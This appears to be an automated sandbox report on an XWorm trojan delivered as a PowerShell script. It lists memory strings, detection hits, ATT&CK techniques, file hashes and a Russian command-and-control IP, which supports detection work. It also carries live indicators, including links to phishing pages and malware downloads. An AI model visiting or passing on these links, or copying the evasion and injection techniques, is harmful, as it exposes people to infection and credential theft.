Source: RegSvcs.exe, 00000005.00000002.2953943377.000000000298E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
Source: RegSvcs.exe, 00000005.00000002.2953943377.000000000298E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Program Manager
Source: RegSvcs.exe, 00000005.00000002.2953943377.000000000298E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: RegSvcs.exe, 00000005.00000002.2953943377.000000000298E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Program Managert-
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.12.dr -- Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.12.dr -- Binary or memory string: msmpeng.exe
Source: Amcache.hve.12.dr -- Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.12.dr -- Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.12.dr -- Binary or memory string: MsMpEng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

Source: Yara match -- File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.powershell.exe.21380403568.0.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.powershell.exe.213812227a0.2.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.powershell.exe.21380403568.0.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.powershell.exe.213812227a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 00000005.00000002.2951130842.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000005.00000002.2953943377.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000002.1427937980.0000021380456000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000002.1427937980.0000021380CF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: Process Memory Space: powershell.exe PID: 7296, type: MEMORYSTR
Source: Yara match -- File source: Process Memory Space: RegSvcs.exe PID: 7560, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match -- File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.powershell.exe.21380403568.0.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.powershell.exe.213812227a0.2.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.powershell.exe.21380403568.0.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.powershell.exe.213812227a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 00000005.00000002.2951130842.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000005.00000002.2953943377.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000002.1427937980.0000021380456000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000002.1427937980.0000021380CF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: Process Memory Space: powershell.exe PID: 7296, type: MEMORYSTR
Source: Yara match -- File source: Process Memory Space: RegSvcs.exe PID: 7560, type: MEMORYSTR

MITRE ATT&CK Matrix (techniques listed per tactic column; bracketed numbers are the badges the report shows next to a technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation [11]; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection [212]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [131]; Process Injection [212]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [1]; Software Packing [2]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery [131]; Process Discovery [2]; Virtualization/Sandbox Evasion [131]; Application Window Discovery [1]; System Network Configuration Discovery [1]; File and Directory Discovery [1]; System Information Discovery [13]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data [11]; Clipboard Data [1]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Encrypted Channel [1]; Non-Standard Port [1]; Application Layer Protocol [1]; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Source | Detection | Scanner | Label
WErY5oc4hl.ps1 | 31% | Virustotal |
WErY5oc4hl.ps1 | 21% | ReversingLabs | Script-PowerShell.Trojan.XWorm
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
92.255.57.155 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
92.255.57.155 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1448591065.0000021390218000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1427937980.00000213812F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000000.00000002.1427937980.0000021380CF7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000000.00000002.1427937980.00000213812F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1448591065.0000021390218000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1427937980.00000213812F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000000.00000002.1427937980.00000213812F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000000.00000002.1427937980.00000213812F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.12.dr | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.1427937980.0000021380001000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1427937980.0000021380001000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2953943377.0000000002861000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
92.255.57.155 | unknown | Russian Federation | 42253 | TELSPRU | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1577166
Start date and time: 2024-12-18 08:14:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: WErY5oc4hl.ps1 (renamed because original name is a hash value)
Original Sample Name: a7ee0a83c40c1d71e9730e1cbf6520b023952fb137a32a6449bd0edffcedf3d5.ps1
Detection: MAL
Classification: mal100.troj.evad.winPS1@9/10@0/1
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 14
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .ps1
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.20, 13.107.246.63, 4.245.163.56, 20.190.147.7
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7296 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
02:15:24 | API Interceptor | 7x Sleep call for process: powershell.exe modified
02:15:28 | API Interceptor | 2917568x Sleep call for process: RegSvcs.exe modified
02:17:54 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
92.255.57.155 | anyrunsample.ps1 | malicious | Unknown | 92.255.57.155/1/1.png
92.255.57.155 | https://reviewgustereports.com/ | malicious | CAPTCHA Scam ClickFix, XWorm | 92.255.57.155/1/1.png

Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0035.t-0009.t-msedge.net | vsuotNfeN7.ps1 | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | credit.js | malicious | PureLog Stealer, RHADAMANTHYS | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1 | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | https://pdf-ezy.com/pdf-ezy.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | https://forms.office.com/Pages/ShareFormPage.aspx?id=z5Knz2h3QUOIV4F1TCr6H8l1dBxA_RZAr7lBOGCmz8VURUlLQURGTlFGTEQ0QzdESlFMT1lGUlpRWi4u&sharetoken=rKEHIuU7H8od3T6m0C0Z | malicious | HTMLPhisher | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | https://drive.google.com/file/d/1t3oVTU9WVeXXW61-QBDfjBrcece1DEFY/view?usp=sharing | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | http://office.yacivt.com/wriEcFSZ | malicious | HTMLPhisher | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | https://1drv.ms/w/c/17cc1e7b64547fa0/ER4uyAUCto9GkfZ_Sw-4_NAB9TeJj_jWV9oRzb3kdQINFQ?e=4%3aaVtPRh&sharingv2=true&fromShare=true&at=9 | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | malicious | Remcos | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | nsdksetup.dll | malicious | Unknown | 13.107.246.63

Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELSPRU | MiGFg375KJ.exe | malicious | XWorm | 92.255.57.155
TELSPRU | anyrunsample.ps1 | malicious | Unknown | 92.255.57.155
TELSPRU | sEOELQpFOB.lnk | malicious | RedLine | 92.255.57.75
TELSPRU | ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk | malicious | RedLine, SectopRAT | 92.255.57.75
TELSPRU | fa20b849ebe7c53d59f3ed0fcfac8445ea08e7296af5a.exe | malicious | Stealc | 92.255.57.89
TELSPRU | LXS5itpTK7.exe | malicious | Stealc | 92.255.57.89
TELSPRU | SEejSLAS9f.exe | malicious | Stealc | 92.255.57.89
TELSPRU | mMgFHz9PdG.exe | malicious | Stealc | 92.255.57.89
TELSPRU | vCZfRWB1kd.exe | malicious | Stealc | 92.255.57.89
TELSPRU | 1891f566c018182f1b5826b5fe2a05d6927aff15638d2.exe | malicious | Stealc | 92.255.57.89
                                        No context
                                        No context
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):1.175770247375884
                                        Encrypted:false
                                        SSDEEP:192:8zfIk8Q/q/0BU/SaiTHy88LkmzuiFUZ24IO8a9:oCQ/xBU/SauSL9zuiFUY4IO8a9
                                        MD5:26E2BEEE16DD3685F349D1BFE7F825CA
                                        SHA1:59A2086B6E68DAA6266EAF5AB4C8A6D39AFDA0BC
                                        SHA-256:B8C401A2C3EC34E753974185B1380E94594775DE4AA5D78C7CDE0634EBCFF0E5
                                        SHA-512:77EB14C20F982884E4B87E6ED14BC3D6894FD6EC41718D969099A936BF0A470DC60AD391E576B8C34ABB2E0CFADF3F10004BF70B3ECC5CBAD431BDCF1DC46126
                                        Malicious:false
                                        Reputation:low
                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.7.9.8.5.0.0.7.9.5.6.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.9.7.9.8.5.0.6.2.6.4.4.1.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.0.d.a.0.3.e.8.-.d.0.8.f.-.4.5.1.9.-.9.6.f.6.-.2.f.0.6.e.2.0.d.5.4.b.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.6.e.4.8.1.c.a.-.7.c.4.4.-.4.2.6.b.-.9.7.5.9.-.3.8.d.9.8.4.9.0.c.b.c.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.8.8.-.0.0.0.1.-.0.0.1.4.-.2.2.2.4.-.d.4.9.b.1.c.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.9.6.9.7.7.1.b.2.f.0.2.2.f.9.a.8.6.d.7.7.a.c.4.d.4.d.2.3.9.b.e.c.d.f.0.8.d.0.7.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 07:17:30 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):334771
                                        Entropy (8bit):3.4637050545638317
                                        Encrypted:false
                                        SSDEEP:3072:CHdIhu0pZIbxwu+f/j5H1JjQrc4uEqmydLTgdnK:CWRpZoxwb1VJjQrc47y5Tgdn
                                        MD5:88D0EC9D93C0674C66CE46CC4BD78ADD
                                        SHA1:AAED8DAA92A5F43E1A941EA9DB650509A02FC470
                                        SHA-256:3430C16F4FF436E6B445B07E25BC01B9A6904A4DA156E7147D347064F0954868
                                        SHA-512:C1FC99D48DB0F0BFE65AD932DC98C49D530D9D24FC2373C274617A20D3C67CE0ACECC460B453464B81154C16135952DADCB22A2EECB4463C7B0AF7B981149E58
                                        Malicious:false
                                        Reputation:low
                                        Preview:MDMP..a..... ........wbg............4........... ...H.......$...h'.......&..$e..........`.......8...........T............?...............'..........x)..............................................................................eJ.......*......GenuineIntel............T............vbg....0........................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8356
                                        Entropy (8bit):3.6918501955114915
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJ4g6hJue6YwXSqgmfZQFpr+89bmssAsfcTnim:R6lXJf6/6YYSqgmfqPmssTfc3
                                        MD5:1A7ADAFA3F6E6292AF135B55B5F0AF9F
                                        SHA1:9903767B8E4283A6089205F81207C1E743039567
                                        SHA-256:AC1C8D262F1F4D87D7451767B3AFA4425AAB81FE0630D0E20B16A974B6E68802
                                        SHA-512:79FCB456C4F3FC79EEACDED82B1FD29D0E53A8B748087F168F972742707AE09F166D1E8D54288DE08C5AA4940FC8AF3EA6921659BD866B5471EEDE2E537DE4F1
                                        Malicious:false
                                        Reputation:low
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.6.0.<./.P.i.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4726
                                        Entropy (8bit):4.446919496950991
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zsOJg77aI9dmnWpW8VYpYm8M4J3uFu9+q8vYzmDI8d:uIjfEI7/mW7VlJvKKmDI8d
                                        MD5:86996530BD13F4F14EDDB845DEAE4E44
                                        SHA1:D67EB214D558A91A614F3A45483CEEB4399D4118
                                        SHA-256:6B4954DE6C7409E6C37E4036D5E3512BADC714B33D5B3B4F138577EDF92B8729
                                        SHA-512:521BA2F33335890D6D88AD5B0BF46FE1197E335BC975BF579A7A67292FA753079CFA1D1ABDC01BF14F8FC9BE47B063E57EA1DF0E6913080CDB0EBAF08F8B685E
                                        Malicious:false
                                        Reputation:low
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636380" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1628158735648508
                                        Encrypted:false
                                        SSDEEP:3:NlllulLhwlz:NllUO
                                        MD5:F442CD24937ABD508058EA44FD91378E
                                        SHA1:FDE63CECA441AA1C5C9C401498F9032A23B38085
                                        SHA-256:E2960AF08E2EE7C9C72EEA31DBBFE1B55B9BF84DE2DD7BB7204487E6AF37B8F6
                                        SHA-512:927E2EEA0BB3FC3D3A0DA7F45644F594CE29F11D90A84B005D723500258DE9E8B3780EB87242F4C62B64B9FEEA1869FC16076FA3AC89EC34E0546CDE1BEF7631
                                        Malicious:false
                                        Preview:@...e................................................@..........
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):6225
                                        Entropy (8bit):3.7414113226775694
                                        Encrypted:false
                                        SSDEEP:48:Ko2TLal4FCCFU20O2ukvhkvklCywJc3YaS2l68SogZokcJTJaXYaS2lZ8SogZokJ:8TfCCKrGkvhkvCCtJ2pS2YHHPpS2dHHJ
                                        MD5:43AEAC48F006DE97EE889CA123262C8F
                                        SHA1:D5704EF8EAD3544E23C1690735485B4C29C8AD30
                                        SHA-256:43D5F0263E560CD77E3B27D40A84DE43B0CAD7E632EB11653BEA072BF746C84A
                                        SHA-512:4F878B049265237D8765660AB8F1A5F1D1A579DC0A6EFCCF65BA9F6DB2AA728FEE526403F71350AADD6C5E84CB6C38A2029100621B293F565626EDF6A510CFAD
                                        Malicious:false
                                        Preview:...................................FL..................F.".. .....*_.....C..Q..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_...%....Q....V..Q......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y.9..........................3*N.A.p.p.D.a.t.a...B.V.1......Y.9..Roaming.@......EW.=.Y.9..........................l..R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Y.9..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Y.9.............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Y.9....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Y.9....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.Y.9....9...........
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:MS Windows registry file, NT/2000 or above
                                        Category:dropped
                                        Size (bytes):1835008
                                        Entropy (8bit):4.417560937661047
                                        Encrypted:false
                                        SSDEEP:6144:ucifpi6ceLPL9skLmb0mWSWSPtaJG8nAgex285i2MMhA20X4WABlGuNa5+:7i58WSWIZBk2MM6AFBco
                                        MD5:83B3AF806388C91463E90455198DE80E
                                        SHA1:8EF260ABC2ED5D464E7A5A59A9FB2A9662FEA2EC
                                        SHA-256:6F3D8639D4B18337F5D6812AE38999CD7DB803E3720492A3BC3BC234A7BAD28B
                                        SHA-512:F18C8B772C98FD3DB99B7CBDE4209C9251EA9F304C25E2AB2C69A77BE95201D123D4FE98247082C93A94793559A8ED57CC45FA34EE6500CA18203A0CDA108E42
                                        Malicious:false
                                        Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmj.#..Q................................................................................................................................................................................................................................................................................................................................................4.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        File type:ASCII text, with very long lines (65463), with CRLF line terminators
                                        Entropy (8bit):5.196029101775158
                                        TrID:
                                          File name:WErY5oc4hl.ps1
                                          File size:143'860 bytes
                                          MD5:f20ada3727c5c319d22931d7bc63a007
                                          SHA1:242d29871bb91f4d3a48cdde6a46df7f458ae22a
                                          SHA256:a7ee0a83c40c1d71e9730e1cbf6520b023952fb137a32a6449bd0edffcedf3d5
